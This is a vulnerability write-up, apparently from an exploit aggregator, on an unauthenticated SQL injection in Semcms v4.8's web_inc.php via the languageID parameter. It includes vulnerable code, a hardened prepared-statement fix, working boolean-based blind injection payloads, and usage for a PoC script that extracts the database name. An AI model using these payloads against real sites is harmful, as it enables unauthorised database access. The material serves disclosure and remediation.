## https://sploitus.com/exploit?id=864585EF-7430-567B-8107-284A1E9D2D55
# Semcms v4.8 web_inc.php SQL Injection



### Introduction to Semcms

SEMCMS is a foreign trade website content management system (CMS) that supports multiple languages.

```
v4.8 Download Link: http://www.sem-cms.com/TradeCmsdown/php/semcms_php_4.8.zip
```

### Vulnerability description

A SQL injection vulnerability exists in SEMCMS v4.8. It stems from a lack of validation of the externally supplied languageID parameter in web_inc.php, whose value is placed directly into a SQL statement. An unauthenticated attacker can use this vulnerability to execute arbitrary SQL commands and obtain sensitive data from the database.

### Vulnerability analysis

The vulnerability exists on line 83 of web_inc.php:

```php
// Line 83 of web_inc.php: languageID is taken from the POST body and
// passed through verify_str() (blacklist) and test_input() (strips
// backslashes and quotes) before being used.
if (isset($_POST["languageID"])){
    $Language=test_input(verify_str($_POST["languageID"]));
}else{
    $Language=verify_str($Language);
}
```

![ID](./images/ID.png)

The value of $Language is brought into the SQL statement on line 88 to be executed:

```php
// Line 88 of web_inc.php: $Language is interpolated into the query without
// quotes, so any value that survives the blacklist is parsed as SQL.
if(!empty($Language)){
      $query=$db_conn->query("select * from sc_tagandseo where languageID=$Language");
      $row=mysqli_fetch_array($query);
      ......
}
```

![SQL](./images/SQL.png)

The verify_str() function relies on a blacklist; test_input() mainly strips backslashes, single quotes and double quotes. Because the SQL statement above does not enclose the value in single or double quotes, no quote is needed to break out of the query, so bypassing the blacklist rules alone is enough to perform SQL injection.

![verify_str](./images/verify_str.png)

![test_input](./images/test_input.png)

Since index.php includes web_inc.php, the same SQL injection can also be triggered through index.php.

![index](./images/index.png)
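The underlying fix is to stop treating languageID as a string that must be filtered and instead validate it as an integer and bind it as a query parameter. The following is an added example of such a hardened replacement for the two code fragments above; it is not Semcms code, and the function names parse_language_id() and fetch_tag_and_seo() are assumptions for illustration.

```php
<?php
// Added example (not from the Semcms code base): hardened handling of
// languageID. Two independent fixes are applied:
//   1. the value is allow-listed as a short decimal integer before use, and
//   2. the query is a prepared statement, so the value is never parsed as SQL.
// Either fix alone closes the injection; using both gives defence in depth.

/**
 * Accept only a string of 1 to 9 decimal digits and return it as an int.
 * Any other shape ("-1 or 1=1", "1 union ...", "") yields null.
 */
function parse_language_id($raw): ?int
{
    if (!is_string($raw) || !preg_match('/^\d{1,9}$/', $raw)) {
        return null;
    }
    return (int)$raw;
}

/**
 * Fetch the sc_tagandseo row for a language with a bound parameter.
 * Returns the row as an associative array, or null on invalid ID / no row.
 * Note: get_result() requires the mysqlnd driver, which is standard in
 * current PHP builds.
 */
function fetch_tag_and_seo(mysqli $db_conn, $raw_language_id): ?array
{
    $languageID = parse_language_id($raw_language_id);
    if ($languageID === null) {
        return null;
    }
    $stmt = $db_conn->prepare("SELECT * FROM sc_tagandseo WHERE languageID = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $languageID);   // 'i' = integer placeholder
    $stmt->execute();
    $result = $stmt->get_result();
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

// Replacement for lines 83-88 of web_inc.php: keep the original fallback to
// the existing $Language value when no POST parameter is present, but never
// concatenate it into SQL.
// $raw = isset($_POST["languageID"]) ? $_POST["languageID"] : $Language;
// $row = fetch_tag_and_seo($db_conn, $raw);
```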

### Vulnerability demonstration

1. Open the URL of a target machine you have set up yourself.
Example: http://www.semcms.com/index.php

2. Capture the request with Burp Suite and construct a boolean-based SQL injection payload:

```mysql
payload: -1 or length(database()) REGEXP char(94,54,36)
```

When the condition is true:

![true1](./images/true1.png)

![true2](./images/true2.png)

```mysql
payload: -1 or length(database()) REGEXP char(94,55,36)
```

When the condition is false:

![false](./images/false.png)

![false2](./images/false2.png)

3. Run the PoC script in this project against the vulnerable URL:

Usage:

```
python poc.py <vuln url>
```

Example:

```
python poc.py http://www.semcms.com/index.php
```

Successfully obtained the database name:

![succ](./images/succ.png)